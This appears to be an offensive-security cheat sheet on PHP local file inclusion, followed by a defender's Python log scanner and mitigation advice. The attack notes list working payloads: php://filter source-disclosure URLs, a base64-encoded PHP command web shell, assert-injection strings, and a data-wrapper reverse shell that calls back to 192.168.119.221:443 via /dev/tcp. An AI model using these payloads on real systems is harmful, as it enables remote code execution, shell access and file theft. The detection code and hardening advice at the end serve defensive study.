# File Inclusion Vuln

## File inclusion Vuln

* **Checking LFI on Windows server**

  Instead of /etc/passwd, use **C:/Windows/System32/drivers/etc/hosts**.
* **PHP Wrappers**

  PHP provides several protocol wrappers that we can use to exploit directory traversal and local file inclusion vulnerabilities. These wrappers give us additional flexibility when attempting to inject PHP code via LFI vulnerabilities.

  We can use the data wrapper to embed inline data as part of the URL, either as plaintext or as base64-encoded data. This wrapper provides us with an alternative payload when we cannot poison a local file with PHP code.

  * **filter** to check source code of executable files
    * http\://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=\<file>
      * <http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php>
        * then decode the output via echo "\<output>" | base64 -d
  * **data:**
    * http\://\<vul-web>/menu.php?file=data:text/plain,\<?php echo shell\_exec("dir") ?>
    * if there is any restriction, it can be bypassed by encoding the payload
      * echo -n '\<?php echo system($\_GET\["cmd"]);?>' | base64
        * PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
      * http\://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==\&cmd=ls
    * Reverse shell http\://\<ip>/section.php?page=data:text/plain,\<?php echo shell\_exec('bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.221%2F443%200%3E%261');?>
* **LFI through an alternate way**

  If ../../../etc/passwd doesn't work, then try:

  * ' and die(show\_source('/etc/passwd')) or '
  * to run a command, use system():
    * ' and die(system("\<command>")) or '

  <https://h0j3n.medium.com/vulnhub-assertion-1-0-1-eb78a0cb9216>
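
A defender-side view of the requests above, as an added example that is not part of the original notes: a small Python scanner that flags these payload shapes in web access logs, including PHP hidden inside a base64 data: payload. The log lines, rule names and function names are constructed for illustration.

```python
import base64
import re
from urllib.parse import urlsplit, unquote

RULES = {  # shapes taken from the payloads listed on this page
    "php-filter": re.compile(r"php://filter", re.I),
    "data-wrapper": re.compile(r"^data:", re.I),
    "traversal": re.compile(r"\.\.[/\\]"),
    "assert-injection": re.compile(r"'\s*and\s+die\s*\(", re.I),
    "php-code": re.compile(r"<\?php", re.I),
}
B64_DATA = re.compile(r"^data:[^,]*;base64,([A-Za-z0-9+/=]+)", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalise(value, rounds=3):
    """Percent-decode a few times so nested encoding cannot hide a match."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(url):
    """Return the sorted rule names matched by any query parameter of url."""
    hits = set()
    for pair in urlsplit(url).query.split("&"):
        value = normalise(pair.partition("=")[2])
        hits.update(name for name, rx in RULES.items() if rx.search(value))
        m = B64_DATA.match(value)
        try:  # look inside a base64 data: payload for embedded PHP
            if m and b"<?php" in base64.b64decode(m.group(1), validate=True):
                hits.add("php-code")
        except ValueError:  # malformed base64: keep the wrapper hit only
            pass
    return sorted(hits)

def scan(log_lines):
    """Map each flagged request URL in access-log lines to its matched rules."""
    urls = (m.group(1) for m in map(REQUEST.search, log_lines) if m)
    return {u: hits for u in urls if (hits := classify(u))}

# Constructed access-log lines (not real traffic); paths mirror the page's examples.
PREFIX = '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET '
SAMPLE_LOG = [PREFIX + path + ' HTTP/1.1" 200 512' for path in (
    "/meteor/index.php?page=about.php",
    "/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php",
    "/meteor/index.php?page=data://text/plain;base64,"
    "PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls",
    "/meteor/index.php?page=..%2f..%2f..%2fetc%2fpasswd",
    "/index.php?page=%27%20and%20die(show_source(%27/etc/passwd%27))%20or%20%27",
)]
```

PHP only honors data:// inside include when allow\_url\_include is enabled, so keeping that setting off and mapping the page parameter to an allowlist of files removes the root cause. Log matching like this is a backstop for spotting attempts.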
